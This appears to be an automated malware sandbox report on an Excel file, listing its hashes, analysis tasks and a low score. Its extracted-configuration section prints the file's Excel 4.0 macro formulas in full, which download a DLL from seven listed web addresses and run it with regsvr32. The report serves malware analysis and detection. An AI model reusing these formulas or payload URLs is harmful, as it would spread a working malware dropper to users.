General
-
Target
58ae93a2fc068f0f52b42e55fb828e2f6213ec0f78f3838f89e9d9c3c1d34562
-
Size
18KB
-
Sample
240909-1tmylascpk
-
MD5
8762ebe9984b59c40d367382f168e840
-
SHA1
efe05b3e0184dda4f69be941c13b11ad0219b354
-
SHA256
58ae93a2fc068f0f52b42e55fb828e2f6213ec0f78f3838f89e9d9c3c1d34562
-
SHA512
131d069291c8b3433e7b61971684e0209ee5e6da87e7678ce6827050768c96d00121f1f94842b88fd42bdb3856d069845f34a53e65b99a89e54c5465594a1ab0
-
SSDEEP
384:uCJj6woT13+oZ7lI+IKeVBZqt7crLqp77x5qZghI0qAztDM/:uC93oxrZ72+/ecmqp7q2hI0rt2
Static task
static1
Behavioral task
behavioral1
Sample
58ae93a2fc068f0f52b42e55fb828e2f6213ec0f78f3838f89e9d9c3c1d34562.xlsx
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
58ae93a2fc068f0f52b42e55fb828e2f6213ec0f78f3838f89e9d9c3c1d34562.xlsx
Resource
win10v2004-20240802-en
Malware Config
Extracted
https://canismallorca.es/wp-admin/OTyeYrx9C9BvYvVb3/
http://capslock.co.za/wp-includes/LMngUUTuanBofr5zK/
http://www.cafe-kwebbel.nl/layouts/3Wkev/
http://bkps.ac.th/b91-std63/Ixv52m8gu4aaUiyb/
http://borbajardinagem.com.br/erros/vlB3f6XpsZG/
http://www.best-design.gr/_errorpages/9wCa7GLI0cl6nM/
http://belleile-do.fr/diapo-ile/EeBHyfGoKYACY/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://canismallorca.es/wp-admin/OTyeYrx9C9BvYvVb3/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://capslock.co.za/wp-includes/LMngUUTuanBofr5zK/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cafe-kwebbel.nl/layouts/3Wkev/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bkps.ac.th/b91-std63/Ixv52m8gu4aaUiyb/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://borbajardinagem.com.br/erros/vlB3f6XpsZG/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.best-design.gr/_errorpages/9wCa7GLI0cl6nM/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://belleile-do.fr/diapo-ile/EeBHyfGoKYACY/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()
Targets
-
-
Target
58ae93a2fc068f0f52b42e55fb828e2f6213ec0f78f3838f89e9d9c3c1d34562
-
Size
18KB
-
MD5
8762ebe9984b59c40d367382f168e840
-
SHA1
efe05b3e0184dda4f69be941c13b11ad0219b354
-
SHA256
58ae93a2fc068f0f52b42e55fb828e2f6213ec0f78f3838f89e9d9c3c1d34562
-
SHA512
131d069291c8b3433e7b61971684e0209ee5e6da87e7678ce6827050768c96d00121f1f94842b88fd42bdb3856d069845f34a53e65b99a89e54c5465594a1ab0
-
SSDEEP
384:uCJj6woT13+oZ7lI+IKeVBZqt7crLqp77x5qZghI0qAztDM/:uC93oxrZ72+/ecmqp7q2hI0rt2
Score3/10 -